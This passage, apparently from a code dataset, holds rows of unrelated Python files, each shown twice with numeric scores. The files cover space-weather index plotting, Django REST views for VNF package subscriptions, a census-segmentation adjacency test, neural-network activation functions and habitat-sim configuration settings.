axes[0].set_title('Dst of Unsmoothed Data')
axes[1].set_title('Dst of Hourly Smoothed Data')
axes[2].set_title('Difference between unsmoothed and hourly Dst')
fig.tight_layout()
'''
'''
fig,ax = plt.subplots()
ax.plot(orig_logs.obs_dst['time'], orig_logs.obs_dst['dst'], '--',color='black',label='Observed DST')
ax.plot(orig_logs['time'], orig_logs['dst_sm'],label='Unsmoothed DST')
ax.plot(hour_logs['time'], hour_logs['dst_sm'],label='Hourly DST')
plt.xlim(hour_logs['time'][0], hour_logs['time'][-1])
leg = ax.legend()
''' | code/results_look.py | import spacepy
import spacepy.pybats.bats as bts
import sys
sys.path.append('/Users/sgraf/Desktop/SWMFtools')
sys.path.append('/Users/sgraf/Desktop/SWMFtools/dBdt')
import util
import matplotlib.pyplot as plt
import matplotlib
import supermag_parser
import spacepy.plot as splot
splot.style('spacepy')
plt.rcParams["legend.frameon"] = True
plt.rcParams["legend.facecolor"] = 'white'
def results_summary_update(log, geolog, show=True):
"""3-panel summary plot from log and geoindex files
"""
fig, axes = plt.subplots(figsize=(10,10),nrows=3, ncols=1, sharex=True,gridspec_kw={'height_ratios': [2, 2, 1]})
geolog.add_ae_quicklook(val='AU', plot_obs=True, target=axes[0], label='Unsmoothed',c='r')
geolog.add_ae_quicklook(val='AL', plot_obs=True, target=axes[0],label=None, c='r')
geolog.add_kp_quicklook(plot_obs=True, target=axes[1], label='Unsmoothed',c='r')
log.add_dst_quicklook(plot_obs=True, target=axes[2], label='Unsmoothed',c='r')
axes[0].set_xlabel('')
axes[1].set_xlabel('')
if show:
plt.show()
return fig, axes
dates = ['20061214','20010830','20050831','20100405','20110805','20150316']
for date in dates:
hour_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date))
orig_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date))
thirty_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min/'.format(date))
thirty_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min'.format(date),logtype='geo')
hour_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date),logtype='geo')
orig_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date),logtype='geo')
fig, axes = results_summary_update(orig_logs,orig_geo,show=False)
hour_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='Hourly', c='b')
hour_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label='Test', c='b')
hour_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='Hourly',c='b')
hour_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='Hourly',c='b')
thirty_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='30min',c='g')
thirty_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label=None,c='g')
thirty_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='30min',c='g')
thirty_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='30min',c='g')
axes[0].get_legend().remove()
axes[2].get_legend().remove()
axes[0].set_ylabel('AU/AL (nT)')
fig.suptitle('Summary Plot')
fig.subplots_adjust(top=0.88)
#plt.show()
plt.savefig('{}_au_al_summary_plot_overlay.png'.format(date))
#fig, axes = results_summary_update(hour_logs,hour_geo,show=False)
#fig.suptitle('Hourly Smoothed Summary Plot')
#fig.subplots_adjust(top=0.88)
#plt.savefig('{}_au_al_summary_plot_hourly.png'.format(date))
#fig, axes = results_summary_update(thirty_logs,thirty_geo,show=False)
#fig.suptitle('30min Smoothed Summary Plot')
#fig.subplots_adjust(top=0.88)
#plt.savefig('{}_au_al_summary_plot_30min.png'.format(date))
'''
diff_dst = orig_logs['dst_sm'] - hour_logs['dst_sm']
fig, axes = plt.subplots(nrows=3, ncols=1, sharex=True)
orig_logs.add_dst_quicklook(plot_obs=True, target=axes[0])
hour_logs.add_dst_quicklook(plot_obs=True, target=axes[1])
axes[2].plot(orig_logs['time'],diff_dst)
axes[0].set_title('Dst of Unsmoothed Data')
axes[1].set_title('Dst of Hourly Smoothed Data')
axes[2].set_title('Difference between unsmoothed and hourly Dst')
fig.tight_layout()
'''
'''
fig,ax = plt.subplots()
ax.plot(orig_logs.obs_dst['time'], orig_logs.obs_dst['dst'], '--',color='black',label='Observed DST')
ax.plot(orig_logs['time'], orig_logs['dst_sm'],label='Unsmoothed DST')
ax.plot(hour_logs['time'], hour_logs['dst_sm'],label='Hourly DST')
plt.xlim(hour_logs['time'][0], hour_logs['time'][-1])
leg = ax.legend()
''' | 0.431824 | 0.273065 |
import logging
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from catalog.packages.biz.vnf_pkg_subscription import CreateSubscription
from catalog.packages.biz.vnf_pkg_subscription import QuerySubscription
from catalog.packages.biz.vnf_pkg_subscription import TerminateSubscription
from catalog.packages.const import TAG_VNF_PACKAGE_API
from catalog.packages.serializers.response import ProblemDetailsSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionRequestSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionsSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgOnboardingNotificationSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgChangeNotificationSerializer
from catalog.packages.views.common import validate_data, validate_req_data
from catalog.pub.exceptions import BadRequestException
from catalog.pub.exceptions import VnfPkgSubscriptionException
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
VALID_FILTERS = [
"callbackUri",
"notificationTypes",
"vnfdId",
"vnfPkgId",
"operationalState",
"usageState"
]
class CreateQuerySubscriptionView(APIView):
"""
This resource represents subscriptions.
The client can use this resource to subscribe to notifications related to NS lifecycle management,
and to query its subscriptions.
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgmSubscriptionRequestSerializer,
responses={
status.HTTP_201_CREATED: PkgmSubscriptionSerializer(),
status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
"""
The POST method creates a new subscription
:param request:
:return:
"""
logger.debug("Create VNF package Subscription> %s" % request.data)
vnf_pkg_subscription_request = validate_req_data(request.data, PkgmSubscriptionRequestSerializer)
data = CreateSubscription(vnf_pkg_subscription_request.data).do_biz()
subscription_info = validate_data(data, PkgmSubscriptionSerializer)
return Response(data=subscription_info.data, status=status.HTTP_201_CREATED)
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_200_OK: PkgmSubscriptionSerializer(),
status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
"""
The GET method queries the list of active subscriptions of the functional block that invokes the method.
It can be used e.g. for resynchronization after error situations.
:param request:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % request.query_params)
if request.query_params and not set(request.query_params).issubset(set(VALID_FILTERS)):
raise BadRequestException("Not a valid filter")
resp_data = QuerySubscription().query_multi_subscriptions(request.query_params)
subscriptions_serializer = PkgmSubscriptionsSerializer(data=resp_data)
if not subscriptions_serializer.is_valid():
raise VnfPkgSubscriptionException(subscriptions_serializer.errors)
return Response(data=subscriptions_serializer.data, status=status.HTTP_200_OK)
class QueryTerminateSubscriptionView(APIView):
"""
This resource represents an individual subscription.
It can be used by the client to read and to terminate a subscription to Notifications related to NS lifecycle management.
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_200_OK: PkgmSubscriptionSerializer(),
status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request, subscriptionId):
"""
The GET method retrieves information about a subscription by reading an individual subscription resource.
:param request:
:param subscriptionId:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
resp_data = QuerySubscription().query_single_subscription(subscriptionId)
subscription_serializer = PkgmSubscriptionSerializer(data=resp_data)
if not subscription_serializer.is_valid():
raise VnfPkgSubscriptionException(subscription_serializer.errors)
return Response(data=subscription_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def delete(self, request, subscriptionId):
"""
The DELETE method terminates an individual subscription.
:param request:
:param subscriptionId:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
TerminateSubscription().terminate(subscriptionId)
return Response(status=status.HTTP_204_NO_CONTENT)
class PkgOnboardingNotificationView(APIView):
"""
This resource represents a notification endpoint about package onboarding
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgOnboardingNotificationSerializer,
responses={
status.HTTP_204_NO_CONTENT: ""
}
)
def post(self):
pass
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
openapi.Schema(type=openapi.TYPE_STRING))}
)
def get(self):
pass
class PkgChangeNotificationView(APIView):
"""
This resource represents a notification endpoint about package change
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgChangeNotificationSerializer,
responses={
status.HTTP_204_NO_CONTENT: ""
}
)
def post(self):
pass
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
openapi.Schema(type=openapi.TYPE_STRING))}
)
def get(self):
pass | catalog/packages/views/vnf_package_subscription_views.py |
import logging
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from catalog.packages.biz.vnf_pkg_subscription import CreateSubscription
from catalog.packages.biz.vnf_pkg_subscription import QuerySubscription
from catalog.packages.biz.vnf_pkg_subscription import TerminateSubscription
from catalog.packages.const import TAG_VNF_PACKAGE_API
from catalog.packages.serializers.response import ProblemDetailsSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionRequestSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionsSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgOnboardingNotificationSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgChangeNotificationSerializer
from catalog.packages.views.common import validate_data, validate_req_data
from catalog.pub.exceptions import BadRequestException
from catalog.pub.exceptions import VnfPkgSubscriptionException
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
VALID_FILTERS = [
"callbackUri",
"notificationTypes",
"vnfdId",
"vnfPkgId",
"operationalState",
"usageState"
]
class CreateQuerySubscriptionView(APIView):
"""
This resource represents subscriptions.
The client can use this resource to subscribe to notifications related to NS lifecycle management,
and to query its subscriptions.
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgmSubscriptionRequestSerializer,
responses={
status.HTTP_201_CREATED: PkgmSubscriptionSerializer(),
status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
"""
The POST method creates a new subscription
:param request:
:return:
"""
logger.debug("Create VNF package Subscription> %s" % request.data)
vnf_pkg_subscription_request = validate_req_data(request.data, PkgmSubscriptionRequestSerializer)
data = CreateSubscription(vnf_pkg_subscription_request.data).do_biz()
subscription_info = validate_data(data, PkgmSubscriptionSerializer)
return Response(data=subscription_info.data, status=status.HTTP_201_CREATED)
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_200_OK: PkgmSubscriptionSerializer(),
status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
"""
The GET method queries the list of active subscriptions of the functional block that invokes the method.
It can be used e.g. for resynchronization after error situations.
:param request:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % request.query_params)
if request.query_params and not set(request.query_params).issubset(set(VALID_FILTERS)):
raise BadRequestException("Not a valid filter")
resp_data = QuerySubscription().query_multi_subscriptions(request.query_params)
subscriptions_serializer = PkgmSubscriptionsSerializer(data=resp_data)
if not subscriptions_serializer.is_valid():
raise VnfPkgSubscriptionException(subscriptions_serializer.errors)
return Response(data=subscriptions_serializer.data, status=status.HTTP_200_OK)
class QueryTerminateSubscriptionView(APIView):
"""
This resource represents an individual subscription.
It can be used by the client to read and to terminate a subscription to Notifications related to NS lifecycle management.
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_200_OK: PkgmSubscriptionSerializer(),
status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request, subscriptionId):
"""
The GET method retrieves information about a subscription by reading an individual subscription resource.
:param request:
:param subscriptionId:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
resp_data = QuerySubscription().query_single_subscription(subscriptionId)
subscription_serializer = PkgmSubscriptionSerializer(data=resp_data)
if not subscription_serializer.is_valid():
raise VnfPkgSubscriptionException(subscription_serializer.errors)
return Response(data=subscription_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
}
)
@view_safe_call_with_log(logger=logger)
def delete(self, request, subscriptionId):
"""
The DELETE method terminates an individual subscription.
:param request:
:param subscriptionId:
:return:
"""
logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
TerminateSubscription().terminate(subscriptionId)
return Response(status=status.HTTP_204_NO_CONTENT)
class PkgOnboardingNotificationView(APIView):
"""
This resource represents a notification endpoint about package onboarding
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgOnboardingNotificationSerializer,
responses={
status.HTTP_204_NO_CONTENT: ""
}
)
def post(self):
pass
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
openapi.Schema(type=openapi.TYPE_STRING))}
)
def get(self):
pass
class PkgChangeNotificationView(APIView):
"""
This resource represents a notification endpoint about package change
"""
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
request_body=PkgChangeNotificationSerializer,
responses={
status.HTTP_204_NO_CONTENT: ""
}
)
def post(self):
pass
@swagger_auto_schema(
tags=[TAG_VNF_PACKAGE_API],
responses={
status.HTTP_204_NO_CONTENT: "",
status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
openapi.Schema(type=openapi.TYPE_STRING))}
)
def get(self):
pass | 0.69368 | 0.066055 |
from segmentaciones import *
from random import *
c11 = Componente(11, randrange(20))
c12 = Componente(12, randrange(20))
c13 = Componente(13, randrange(20))
c14 = Componente(14, randrange(20))
c21 = Componente(21, randrange(20))
c22 = Componente(22, randrange(20))
c23 = Componente(23, randrange(20))
c24 = Componente(24, randrange(20))
c31 = Componente(31, randrange(20))
c32 = Componente(32, randrange(20))
c33 = Componente(33, randrange(20))
c34 = Componente(34, randrange(20))
c41 = Componente(41, randrange(20))
c42 = Componente(42, randrange(20))
c43 = Componente(43, randrange(20))
c44 = Componente(44, randrange(20))
# doblar
c11.agregar_adyacencia(c12)
c12.agregar_adyacencia(c13)
c13.agregar_adyacencia(c14)
c14.agregar_adyacencia(c11)
c21.agregar_adyacencia(c22)
c22.agregar_adyacencia(c23)
c23.agregar_adyacencia(c24)
c24.agregar_adyacencia(c21)
c31.agregar_adyacencia(c32)
c32.agregar_adyacencia(c33)
c33.agregar_adyacencia(c34)
c34.agregar_adyacencia(c31)
c41.agregar_adyacencia(c42)
c42.agregar_adyacencia(c43)
c43.agregar_adyacencia(c44)
c44.agregar_adyacencia(c41)
# volver
c12.agregar_adyacencia(c24)
c24.agregar_adyacencia(c12)
c13.agregar_adyacencia(c31)
c31.agregar_adyacencia(c13)
c23.agregar_adyacencia(c41)
c41.agregar_adyacencia(c23)
c32.agregar_adyacencia(c44)
c44.agregar_adyacencia(c32)
# cruzar
c11.agregar_adyacencia(c21)
c23.agregar_adyacencia(c13)
c31.agregar_adyacencia(c41)
c43.agregar_adyacencia(c33)
c34.agregar_adyacencia(c14)
c12.agregar_adyacencia(c32)
c44.agregar_adyacencia(c24)
c22.agregar_adyacencia(c42)
componentes = Componentes([
c11, c21,
c14, c12, c24, c22,
c13, c23,
c31, c41,
c34, c32, c44, c42,
c33, c43,
])
set_segmentacion_deseada(40)
print ('---------------componentes-con-adyacencias---')
for c in componentes:
adys = Componentes()
for a in c.adyacentes:
adys.append(a.id)
print (c.id, '(', c.vivs,')', adys)
print ('---------------test-conectados---------------')
print ('---------------segmentos---------------------')
segmento_mza1_1 = Segmento([c11, c12, c13, c14])
segmento_mza1_2 = Segmento([c21, c22, c23, c24])
segmento_mza1_3 = Segmento([c31, c32, c33, c34])
segmento_mza1_4 = Segmento([c41, c42, c43, c44])
print ('mza1 ', segmento_mza1_1)
print ('mza2 ', segmento_mza1_2)
print ('mza3 ', segmento_mza1_3)
print ('mza4 ', segmento_mza1_4) | sandbox/test_vecinos.py | from segmentaciones import *
from random import *
c11 = Componente(11, randrange(20))
c12 = Componente(12, randrange(20))
c13 = Componente(13, randrange(20))
c14 = Componente(14, randrange(20))
c21 = Componente(21, randrange(20))
c22 = Componente(22, randrange(20))
c23 = Componente(23, randrange(20))
c24 = Componente(24, randrange(20))
c31 = Componente(31, randrange(20))
c32 = Componente(32, randrange(20))
c33 = Componente(33, randrange(20))
c34 = Componente(34, randrange(20))
c41 = Componente(41, randrange(20))
c42 = Componente(42, randrange(20))
c43 = Componente(43, randrange(20))
c44 = Componente(44, randrange(20))
# doblar
c11.agregar_adyacencia(c12)
c12.agregar_adyacencia(c13)
c13.agregar_adyacencia(c14)
c14.agregar_adyacencia(c11)
c21.agregar_adyacencia(c22)
c22.agregar_adyacencia(c23)
c23.agregar_adyacencia(c24)
c24.agregar_adyacencia(c21)
c31.agregar_adyacencia(c32)
c32.agregar_adyacencia(c33)
c33.agregar_adyacencia(c34)
c34.agregar_adyacencia(c31)
c41.agregar_adyacencia(c42)
c42.agregar_adyacencia(c43)
c43.agregar_adyacencia(c44)
c44.agregar_adyacencia(c41)
# volver
c12.agregar_adyacencia(c24)
c24.agregar_adyacencia(c12)
c13.agregar_adyacencia(c31)
c31.agregar_adyacencia(c13)
c23.agregar_adyacencia(c41)
c41.agregar_adyacencia(c23)
c32.agregar_adyacencia(c44)
c44.agregar_adyacencia(c32)
# cruzar
c11.agregar_adyacencia(c21)
c23.agregar_adyacencia(c13)
c31.agregar_adyacencia(c41)
c43.agregar_adyacencia(c33)
c34.agregar_adyacencia(c14)
c12.agregar_adyacencia(c32)
c44.agregar_adyacencia(c24)
c22.agregar_adyacencia(c42)
componentes = Componentes([
c11, c21,
c14, c12, c24, c22,
c13, c23,
c31, c41,
c34, c32, c44, c42,
c33, c43,
])
set_segmentacion_deseada(40)
print ('---------------componentes-con-adyacencias---')
for c in componentes:
adys = Componentes()
for a in c.adyacentes:
adys.append(a.id)
print (c.id, '(', c.vivs,')', adys)
print ('---------------test-conectados---------------')
print ('---------------segmentos---------------------')
segmento_mza1_1 = Segmento([c11, c12, c13, c14])
segmento_mza1_2 = Segmento([c21, c22, c23, c24])
segmento_mza1_3 = Segmento([c31, c32, c33, c34])
segmento_mza1_4 = Segmento([c41, c42, c43, c44])
print ('mza1 ', segmento_mza1_1)
print ('mza2 ', segmento_mza1_2)
print ('mza3 ', segmento_mza1_3)
print ('mza4 ', segmento_mza1_4) | 0.190385 | 0.092442 |
import numpy as np
def identity(z):
"""Identity function...
Args:
z (np.array)
Returns:
f(z) = z (np.array)
"""
return z
def dfdz_identity(z):
"""Derivative of the Identity function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 (np.array)
"""
return np.ones_like(z)
def sigmoid(z):
"""Sigmoid function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return 1.0 / (1.0 + np.exp(-z))
def dfdz_sigmoid(z):
"""Derivative of the Sigmoid function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def logistic(z):
"""Logistic function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return sigmoid(z)
def dfdz_logistic(z):
"""Derivative of the Logistic function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def tanh(z):
"""Hyperbolic tangent function...
Args:
z (np.array)
Returns:
f(z) = 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0 (np.array)
"""
return 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0
def dfdz_tanh(z):
"""Derivative of the hyperbolic tangent function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 - np.square(tanh(z)) (np.array)
"""
return 1.0 - np.square(tanh(z))
def softsign(z):
"""Softsign function...
Args:
z (np.array)
Returns:
f(z) = z / (1.0 + np.abs(z)) (np.array)
"""
return z / (1.0 + np.abs(z))
def dfdz_softsign(z):
"""Derivative of the softsign function...
Args:
z (np.array)
Returns:
df(z)/dz = None (np.array)
"""
raise RuntimeError('not implemented...')
def ReLU(z):
"""Rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = np.max(0, z) (np.array)
"""
return z * (z > 0)
def dfdz_ReLU(z):
"""Derivative of the rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0 (np.array)
"""
return (z > 0)
def LReLU(z):
"""Leaky rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else 0.01 * z (np.array)
"""
return PReLU(z, 0.01)
def dfdz_LReLU(z):
"""Derivative of the leaky rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0.01 (np.array)
"""
return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
"""Parametric rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else alpha * z (np.array)
"""
return z * (z > 0) + alpha * z * (z <= 0)
def dfdz_PReLU(z, alpha):
"""Derivative of the parametric rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else alpha (np.array)
"""
return 1.0 * (z > 0) + alpha * (z <= 0) | MachineLearningLibrary/NeuralNetworks/NeuralNetworkUtilities.py | import numpy as np
def identity(z):
"""Identity function...
Args:
z (np.array)
Returns:
f(z) = z (np.array)
"""
return z
def dfdz_identity(z):
"""Derivative of the Identity function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 (np.array)
"""
return np.ones_like(z)
def sigmoid(z):
"""Sigmoid function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return 1.0 / (1.0 + np.exp(-z))
def dfdz_sigmoid(z):
"""Derivative of the Sigmoid function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def logistic(z):
"""Logistic function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return sigmoid(z)
def dfdz_logistic(z):
"""Derivative of the Logistic function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def tanh(z):
"""Hyperbolic tangent function...
Args:
z (np.array)
Returns:
f(z) = 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0 (np.array)
"""
return 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0
def dfdz_tanh(z):
"""Derivative of the hyperbolic tangent function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 - np.square(tanh(z)) (np.array)
"""
return 1.0 - np.square(tanh(z))
def softsign(z):
"""Softsign function...
Args:
z (np.array)
Returns:
f(z) = z / (1.0 + np.abs(z)) (np.array)
"""
return z / (1.0 + np.abs(z))
def dfdz_softsign(z):
"""Derivative of the softsign function...
Args:
z (np.array)
Returns:
df(z)/dz = None (np.array)
"""
raise RuntimeError('not implemented...')
def ReLU(z):
"""Rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = np.max(0, z) (np.array)
"""
return z * (z > 0)
def dfdz_ReLU(z):
"""Derivative of the rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0 (np.array)
"""
return (z > 0)
def LReLU(z):
"""Leaky rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else 0.01 * z (np.array)
"""
return PReLU(z, 0.01)
def dfdz_LReLU(z):
"""Derivative of the leaky rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0.01 (np.array)
"""
return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
"""Parametric rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else alpha * z (np.array)
"""
return z * (z > 0) + alpha * z * (z <= 0)
def dfdz_PReLU(z, alpha):
"""Derivative of the parametric rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else alpha (np.array)
"""
return 1.0 * (z > 0) + alpha * (z <= 0) | 0.948155 | 0.761561 |
import habitat_sim
import habitat_sim.agent
default_sim_settings = {
# settings shared by example.py and benchmark.py
"max_frames": 1000,
"width": 640,
"height": 480,
"default_agent": 0,
"sensor_height": 1.5,
"color_sensor": True, # RGB sensor (default: ON)
"semantic_sensor": False, # semantic sensor (default: OFF)
"depth_sensor": False, # depth sensor (default: OFF)
"ortho_sensor": False, # Orthographic RGB sensor (default: OFF)
"seed": 1,
"silent": False, # do not print log info (default: OFF)
# settings exclusive to example.py
"save_png": False, # save the pngs to disk (default: OFF)
"print_semantic_scene": False,
"print_semantic_mask_stats": False,
"compute_shortest_path": False,
"compute_action_shortest_path": False,
"scene": "data/scene_datasets/habitat-test-scenes/skokloster-castle.glb",
"test_scene_data_url": "http://dl.fbaipublicfiles.com/habitat/habitat-test-scenes.zip",
"goal_position": [5.047, 0.199, 11.145],
"enable_physics": False,
"enable_gfx_replay_save": False,
"physics_config_file": "./data/default.physics_config.json",
"num_objects": 10,
"test_object_index": 0,
"frustum_culling": True,
}
# build SimulatorConfiguration
def make_cfg(settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
if "frustum_culling" in settings:
sim_cfg.frustum_culling = settings["frustum_culling"]
else:
sim_cfg.frustum_culling = False
if "enable_physics" in settings:
sim_cfg.enable_physics = settings["enable_physics"]
if "physics_config_file" in settings:
sim_cfg.physics_config_file = settings["physics_config_file"]
if not settings["silent"]:
print("sim_cfg.physics_config_file = " + sim_cfg.physics_config_file)
if "scene_light_setup" in settings:
sim_cfg.scene_light_setup = settings["scene_light_setup"]
sim_cfg.gpu_device_id = 0
if not hasattr(sim_cfg, "scene_id"):
raise RuntimeError(
"Error: Please upgrade habitat-sim. SimulatorConfig API version mismatch"
)
sim_cfg.scene_id = settings["scene"]
# define default sensor parameters (see src/esp/Sensor/Sensor.h)
sensor_specs = []
if settings["color_sensor"]:
color_sensor_spec = habitat_sim.CameraSensorSpec()
color_sensor_spec.uuid = "color_sensor"
color_sensor_spec.sensor_type = habitat_sim.SensorType.COLOR
color_sensor_spec.resolution = [settings["height"], settings["width"]]
color_sensor_spec.position = [0, settings["sensor_height"], 0]
color_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(color_sensor_spec)
if settings["depth_sensor"]:
depth_sensor_spec = habitat_sim.CameraSensorSpec()
depth_sensor_spec.uuid = "depth_sensor"
depth_sensor_spec.sensor_type = habitat_sim.SensorType.DEPTH
depth_sensor_spec.resolution = [settings["height"], settings["width"]]
depth_sensor_spec.position = [0, settings["sensor_height"], 0]
depth_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(depth_sensor_spec)
if settings["semantic_sensor"]:
semantic_sensor_spec = habitat_sim.CameraSensorSpec()
semantic_sensor_spec.uuid = "semantic_sensor"
semantic_sensor_spec.sensor_type = habitat_sim.SensorType.SEMANTIC
semantic_sensor_spec.resolution = [settings["height"], settings["width"]]
semantic_sensor_spec.position = [0, settings["sensor_height"], 0]
semantic_sensor_spec.sensor_subtype = habitat_sim.SensorSubType.PINHOLE
sensor_specs.append(semantic_sensor_spec)
if settings["ortho_sensor"]:
